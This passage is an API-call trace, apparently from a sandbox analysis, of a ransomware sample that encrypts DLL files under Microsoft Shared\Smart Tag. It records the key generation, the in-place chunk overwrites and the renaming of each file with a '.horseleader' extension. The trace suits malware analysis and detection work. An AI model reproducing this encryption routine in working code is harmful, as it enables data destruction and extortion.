lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.522] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.522] CloseHandle (hObject=0x158) returned 1 [0245.523] GetProcessHeap () returned 0x780000 [0245.523] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.523] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL.horseleader") returned 84 [0245.523] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fbiblio.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FBIBLIO.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fbiblio.dll.horseleader")) returned 1 [0245.524] GetProcessHeap () returned 0x780000 [0245.524] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.524] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b89b100, ftCreationTime.dwHighDateTime=0x1caac21, ftLastAccessTime.dwLowDateTime=0x60c49690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7b89b100, ftLastWriteTime.dwHighDateTime=0x1caac21, nFileSizeHigh=0x0, nFileSizeLow=0x17f80, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FDATE.DLL", cAlternateFileName="")) returned 1 [0245.524] lstrcmpiW (lpString1="FDATE.DLL", lpString2="Windows") returned -1 [0245.524] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL") returned 70 [0245.524] StrStrIW (lpFirst="FDATE.DLL", lpSrch=".horseleader") returned 0x0 [0245.524] lstrcmpW (lpString1="FDATE.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.524] lstrcmpW (lpString1="FDATE.DLL", lpString2="_uninstalling_.png") returned 1 [0245.524] lstrlenW (lpString=".testttjffg") returned 11 [0245.524] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL", lpSrch=".testttjffg") returned 0x0 [0245.524] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.524] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.524] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fdate.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.525] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL") returned 70 [0245.525] StrStrW (lpFirst="FDATE.DLL", lpSrch=".txt") returned 0x0 [0245.525] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=98176) returned 1 [0245.525] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.525] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.527] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.528] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.529] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x97c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.529] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.529] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.529] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.529] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x12f80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.529] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.530] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.530] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.530] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.530] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.530] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.531] CloseHandle (hObject=0x158) returned 1 [0245.531] GetProcessHeap () returned 0x780000 [0245.531] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.531] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL.horseleader") returned 82 [0245.531] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fdate.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FDATE.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fdate.dll.horseleader")) returned 1 [0245.532] GetProcessHeap () returned 0x780000 [0245.532] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.532] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b89b100, ftCreationTime.dwHighDateTime=0x1caac21, ftLastAccessTime.dwLowDateTime=0x618eeb70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7b89b100, ftLastWriteTime.dwHighDateTime=0x1caac21, nFileSizeHigh=0x0, nFileSizeLow=0x35380, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FPERSON.DLL", cAlternateFileName="")) returned 1 [0245.532] lstrcmpiW (lpString1="FPERSON.DLL", lpString2="Windows") returned -1 [0245.532] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL") returned 72 [0245.532] StrStrIW (lpFirst="FPERSON.DLL", lpSrch=".horseleader") returned 0x0 [0245.532] lstrcmpW (lpString1="FPERSON.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.532] lstrcmpW (lpString1="FPERSON.DLL", lpString2="_uninstalling_.png") returned 1 [0245.532] lstrlenW (lpString=".testttjffg") returned 11 [0245.532] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL", lpSrch=".testttjffg") returned 0x0 [0245.532] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.532] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.532] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fperson.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.540] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL") returned 72 [0245.540] StrStrW (lpFirst="FPERSON.DLL", lpSrch=".txt") returned 0x0 [0245.540] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=217984) returned 1 [0245.540] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.541] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.545] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.546] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.546] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x181c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.546] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.546] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.547] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.547] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x30380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.547] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.549] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.549] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.549] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.549] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.549] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.549] CloseHandle (hObject=0x158) returned 1 [0245.550] GetProcessHeap () returned 0x780000 [0245.550] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.550] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL.horseleader") returned 84 [0245.550] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fperson.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPERSON.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fperson.dll.horseleader")) returned 1 [0245.551] GetProcessHeap () returned 0x780000 [0245.551] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.551] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66f78700, ftCreationTime.dwHighDateTime=0x1cb7000, ftLastAccessTime.dwLowDateTime=0xc251c2e0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x66f78700, ftLastWriteTime.dwHighDateTime=0x1cb7000, nFileSizeHigh=0x0, nFileSizeLow=0x2c380, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FPLACE.DLL", cAlternateFileName="")) returned 1 [0245.551] lstrcmpiW (lpString1="FPLACE.DLL", lpString2="Windows") returned -1 [0245.551] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL") returned 71 [0245.551] StrStrIW (lpFirst="FPLACE.DLL", lpSrch=".horseleader") returned 0x0 [0245.551] lstrcmpW (lpString1="FPLACE.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.551] lstrcmpW (lpString1="FPLACE.DLL", lpString2="_uninstalling_.png") returned 1 [0245.551] lstrlenW (lpString=".testttjffg") returned 11 [0245.551] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL", lpSrch=".testttjffg") returned 0x0 [0245.551] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.552] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.552] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fplace.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.552] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL") returned 71 [0245.552] StrStrW (lpFirst="FPLACE.DLL", lpSrch=".txt") returned 0x0 [0245.553] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=181120) returned 1 [0245.553] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.553] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.555] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.555] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.557] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x139c0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.557] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.557] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.557] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.557] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x27380, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.558] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.559] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.559] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.559] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.560] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0245.560] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0245.560] CloseHandle (hObject=0x158) returned 1 [0245.560] GetProcessHeap () returned 0x780000 [0245.560] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0245.560] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL.horseleader") returned 83 [0245.560] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fplace.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FPLACE.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fplace.dll.horseleader")) returned 1 [0245.561] GetProcessHeap () returned 0x780000 [0245.561] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0245.561] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x79275700, ftCreationTime.dwHighDateTime=0x1caac21, ftLastAccessTime.dwLowDateTime=0xeedd0ad0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x79275700, ftLastWriteTime.dwHighDateTime=0x1caac21, nFileSizeHigh=0x0, nFileSizeLow=0x26d80, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="FSTOCK.DLL", cAlternateFileName="")) returned 1 [0245.561] lstrcmpiW (lpString1="FSTOCK.DLL", lpString2="Windows") returned -1 [0245.561] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL") returned 71 [0245.561] StrStrIW (lpFirst="FSTOCK.DLL", lpSrch=".horseleader") returned 0x0 [0245.561] lstrcmpW (lpString1="FSTOCK.DLL", lpString2="#Decrypt#.txt") returned 1 [0245.561] lstrcmpW (lpString1="FSTOCK.DLL", lpString2="_uninstalling_.png") returned 1 [0245.561] lstrlenW (lpString=".testttjffg") returned 11 [0245.561] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL", lpSrch=".testttjffg") returned 0x0 [0245.561] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0245.561] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0245.562] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\fstock.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0245.562] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\FSTOCK.DLL") returned 71 [0245.562] StrStrW (lpFirst="FSTOCK.DLL", lpSrch=".txt") returned 0x0 [0245.562] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=159104) returned 1 [0245.562] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.562] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.565] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.565] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.565] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x10ec0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.565] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.567] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.567] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.568] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x21d80, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.568] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.569] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0245.569] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0245.570] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.570] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | 